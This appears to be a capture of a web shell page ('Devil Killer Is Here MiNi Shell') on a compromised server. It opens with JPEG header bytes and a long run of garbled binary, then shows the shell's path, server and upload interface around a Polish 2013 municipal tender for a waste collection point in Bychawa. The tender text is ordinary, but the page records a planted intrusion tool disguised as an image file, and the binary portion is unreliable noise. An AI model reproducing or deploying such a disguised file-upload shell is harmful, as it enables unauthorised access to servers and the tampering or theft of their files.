JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131211/512954-N-2013.html

<p class="kh_header"><b>Bychawa: Organizacja i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) na terenie Gminy Bychawa.</b><br>
<b>Numer ogłoszenia: 512954 - 2013; data zamieszczenia: 11.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bychawa , ul. Partyzantów 1, 23-100 Bychawa, woj. lubelskie, tel. 81 5660004 w. 42, faks 81 5660048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://umbychawa.bip.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) na terenie Gminy Bychawa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i prowadzenie Punktu Selektywnej Zbiórki Odpadów Komunalnych (PSZOK) na terenie Gminy Bychawa, 
1. Wymagania ogólne dla Punktu Selektywnej Zbiórki Opadów Komunalnych:
1.1.  Lokalizacja musi być zgodna z Miejscowym Planem Zagospodarowania Przestrzennego Gminy Bychawa, musi  spełniać wymagania prawa budowlanego, ochrony środowiska, przepisów bhp i ppoż.
1.2.  Lokalizacja musi zapewniać dogodny dojazd dla wszystkich mieszkańców Gminy Bychawa, z możliwością zaparkowania, musi posiadać odpowiedniej wielkości plac manewrowy pozwalający na swobodny dostęp pojazdów dowożących jak też wywożących odpady.
1.3. Punkt musi być utworzony na terenie o powierzchni co najmniej 500 m2. 
1.4.  Wykonawca, na czas realizacji przedmiotu zamówienia, powinien posiadać prawo do dysponowania terenem z przeznaczeniem na prowadzenie działalności związanej ze zbieraniem od właścicieli nieruchomości Gminy Bychawa odpadów komunalnych.
1.5. Teren powinien być ogrodzony, oświetlony, utwardzony wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków pochodzących z terenu ww. punktu, zgodnie z wymaganiami określonymi przepisami m.in. ustawy z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2012 r. poz. 145).
1.6.  Teren powinien być wyposażony w zamykane pojemniki i kontenery oraz wiaty, chroniące zebrane odpady przed wpływem czynników atmosferycznych i dostępem zwierząt. Dopuszcza się w zamian za kontenery i pojemniki, utworzenie zabezpieczonych miejsc do magazynowania odpadów wielkogabarytowych, gruzu budowlanego oraz zużytych opon.
1.7. Zapewnienie ciągłej obsługi punktu wraz z zabezpieczeniem pomieszczenia socjalnego o wielkości odpowiadającej ilości osób zatrudnionych, wyposażonego w sanitariat, energię elektryczną, bieżącą wodę, ogrzewanie.
1.8. Na terenie PSZOK znajdować się musi, w miejscu ogólnie dostępnym, tablica informacyjna zawierająca dane Wykonawcy (Pełna nazwa, adres i numer telefonu), wykaz rodzaj i ilości przyjmowanych odpadów komunalnych, dni i godziny pracy  ( regulamin PSZOK). 
2. Wykonawca jest obowiązany, w związku z realizacją zadania,  do:
2.1. Posiadania stosownego zezwolenia na prowadzenie działalności w zakresie zbierania i transportu odpadów, w tym prowadzenia PSZOK, zgodnie z ustawą 
o odpadach (Dz. U. z 2013 r., poz. 21 z późn. zm.). Zezwolenie na prowadzenie działalności w zakresie zbierania odpadów wydaje się po uzyskaniu pozwolenia na użytkowanie obiektu lub po zakończeniu postępowania w sprawie zgłoszenia zmiany sposobu użytkowania obiektu budowlanego lub jego części w rozumieniu ustawy 
z dnia 7 lipca 1994 r. - Prawo budowlane, jeżeli są wymagane.
2.2. Uzyskania wszystkich wymaganych innych decyzji niezbędnych do realizacji powierzonego zadania.
2.3. Zapewnienia pracy punktu w godzinach wskazanych w uchwale Rady Miejskiej  w Bychawie z dnia 28 lutego 2013 r. Nr XXVI/180/2013 w sprawie określenia szczegółowego sposobu i zakresu świadczenie usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów, stanowiącej załącznik Nr 5 do niniejszej specyfikacji.
2.4. Nieodpłatnego przyjmowania n/w rodzajów odpadów komunalnych powstających  w gospodarstwach domowych na terenie gminy:
- odpady komunalne ulegające biodegradacji;
- odpady zielone; 
- przeterminowane leki; 
- chemikalia;
- zużyte baterie i akumulatory; 
- zużyty sprzęt elektryczny i elektroniczny (pod warunkiem, że sprzęt jest kompletny)
-  meble i inne odpady wielkogabarytowe; 
- odpady budowlane i rozbiórkowe (pod warunkiem dostarczanie czystego gruzu);
- zużyte opony;
- popiół; 
po okazaniu dokumentu potwierdzającego tożsamość lub potwierdzenie złożenia deklaracji, bądź też potwierdzenie uiszczenia opłaty za gospodarowanie odpadami komunalnymi na rzecz Gminy Bychawa.
Przewidywane ilości odpadów dostarczanych do PSZOK w ciągu roku są następujące:
1  Odpady komunalne ulegające biodegradacji (odzież, tekstylia, dywany, chodniki, drewno, papier, tektura)	21 476,60 Kg
2 Odpady zielone	 4 854,30 kg
3 Przeterminowane leki	   147,10 kg
4 Chemikalia	1  765,20 kg
5 Zużyte baterie	   441,30 kg
6 Akumulatory	2  942,00 kg
7 Zużyty sprzęt elektryczny i elektroniczny (pod warunkiem, że sprzęt jest kompletny)	2  942,00 kg
8 Meble i inne odpady wielkogabarytowe	21  476,60 kg
9 Odpady budowlane i rozbiórkowe (pod warunkiem dostarczania czystego gruzu);	71  931,90 kg
10. Zużyte opony;	1   176,80 kg
11. Popiół	17  946,20 kg 
Razem:	147  100,00 kg
Wskazane ilości odpadów należy traktować szacunkowo. Mogą one ulec zmianie stosownie do rzeczywistej ilości odpadów wytworzonych przez mieszkańców gminy Bychawa.
2.5. Przeprowadzenia zbiórki popiołu wytworzonego na terenie nieruchomości zamieszkałych, z 6 punktów zlokalizowanych na terenie miasta Bychawa, raz w miesiącu w sezonie grzewczym tj. od stycznia do kwietnia 2014 r. oraz od października do grudnia 2014 r.
2.6. Przeprowadzenia zbiórki odpadów zielonych (części roślin pochodzące z pielęgnacji terenów zielonych tj. trawa, liście, gałęzie, wycięte rośliny, choinki z wyłączeniem ziemi, pni, karp, konarów powstałych w wyniku wycinki drzew. Odpady zielone nie mogą zawierać zanieczyszczeń natury nieorganicznej (ziemia, kamienie), resztek jedzeniowych pochodzenia zwierzęcego, pozostałości po spaleniu) wytworzonych na terenie nieruchomości zamieszkałych, z 6 punktów zlokalizowanych na terenie miasta Bychawa, raz w miesiącu w okresie  od kwietnia do października 2014 r.
2.7. Usuwania odpadów (transport, unieszkodliwianie), ponoszenia wszystkich kosztów związanych z utworzeniem i funkcjonowaniem PSZOK.
2.8. Utrzymania czystości i porządku na terenie PSZOK, selektywnie zebrane odpady komunalne winny być na bieżąco, po zapełnieniu pojemników, kontenerów lub innych miejsc do tego przeznaczonych przekazywane do instalacji odzysku. 
2.9. Zważenia lub w inny sposób określenia ilości przyjętych odpadów po odbiorze poszczególnych frakcji wyselekcjonowanych odpadów i odnotowywania jej  w ewidencji wraz ze wskazaniem miejscowości, numeru posesji oraz danymi właściciela lub innej osoby odpowiedzialnej za utrzymanie czystości i porządku na terenie danej nieruchomości.
2.10.Prowadzenia rejestru odpadów przyjmowanych w Punkcie, zawierającego między innymi informacje o rodzaju, kodzie, masie lub ilości odebranych odpadów, dacie ich dostarczenia do punktu oraz sposobie ich dalszego wykorzystania.
2.11. Składania Zamawiającemu kwartalnego sprawozdania zgodnego z przepisami ustawy o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r., poz. 391), który zawierać będzie:
- informację o rodzaju , kodzie , masie lub ilości odebranych odpadów,
- dacie dostarczenia odpadów do Punktu oraz sposobie ich dalszego wykorzystania.
Sprawozdania należy składać zgodnie z wzorem określonym w rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. (Dz. U. z 2012, poz. 630) oraz przekazywać go do Zamawiającego w terminie nie później niż do końca miesiąca następującego po kwartale którego dotyczy. 
2.12. Przekazania Zamawiającemu kopii dokumentów potwierdzających przekazanie odpadów do Zakładu Zagospodarowania Odpadów w Kraśniku z o. o. z siedzibą w Kraśniku ul. M. J. Piłsudskiego (jeżeli w czasie obowiązywania umowy zostanie uruchomiona instalacja RIPOK w Bełżycach, zgromadzone odpady należy dostarczyć do instalacji w Bełżycach) lub innym podmiotom uprawnionym do ich odzysku lub unieszkodliwiania, w formie karty ewidencji odpadów lub karty przekazania odpadów. 
2.13. Przekazywania Zamawiającemu informacji w zakresie: wykazu posesji,  z których zostały dostarczone odpady, ich rodzaju i ilości oraz potwierdzenia ich przekazania.
2.14. Wykonywania przedmiotu  zamówienia zgodnie z obowiązującymi przepisami ustawy prawo ochrony środowiska (Dz.U. z 2008 r. Nr 25, poz.150) oraz rozporządzeniem wydanym na podstawie art. 9d ust. 2 ustawy z dnia 13 września 1996 r. roku o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012 r. poz. 391 z późn. zm.).
2.15. Prowadzenia działalności propagującej funkcjonowanie punktu.
4.3. Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu, powstałe podczas i w związku z realizacją przedmiotu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się udzielenie zamówień uzupełniających spełniających wymogi art. 67 ust. 1 pkt 6 ustawy prawo zamówień publicznych.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.12.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie ma wymogu wpłacenia wadium przez Wykonawców.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy posiadają stosowne zezwolenie na prowadzenie działalności w zakresie zbierania  i transportu odpadów, w tym prowadzenie  punktu selektywnej zbiórki odpadów komunalnych, zgodnie z ustawą o odpadach (Dz. U. z 2013 r., poz. 21 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią Wykonawcy, którzy dysponują potencjałem technicznym niezbędnym do wykonania zamówienia, w tym co najmniej jednym pojazdem specjalnym przystosowanym do odbioru i transportu odpadów komunalnych, spełniającym warunki techniczne pojazdów określone w odrębnych przepisach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku składania oferty wspólnej przez kilku przedsiębiorców w ramach spółki cywilnej lub konsorcjum do oferty należy dołączyć pełnomocnictwo dla jednego podmiotu do reprezentowania wszystkich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego (art. 23 ust. 2 ustawy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki dokonania  zmiany umowy, w przypadku  : 
-  wystąpienia uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli zmiany te są korzystne dla Zamawiającego;
-  dostosowania umowy do zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia;
-   w ustawowej zmiany podatku od towarów i usług dotyczącej przedmiotu umowy.  W ww. przypadku stronom będzie przysługiwało prawo zmiany wysokości wynagrodzenia umownego, odpowiednio do ustalonej przez ustawodawcę zmiany wysokości podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umbychawa.bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bychawie 
ul. Partyzantów 1
23-100 Bychawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2013 godzina 11:00, miejsce: Urząd Miejski w Bychawie
ul. Partyzantów 1 
23-100 Bychawa
Punkt Obsługi Interesanta - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com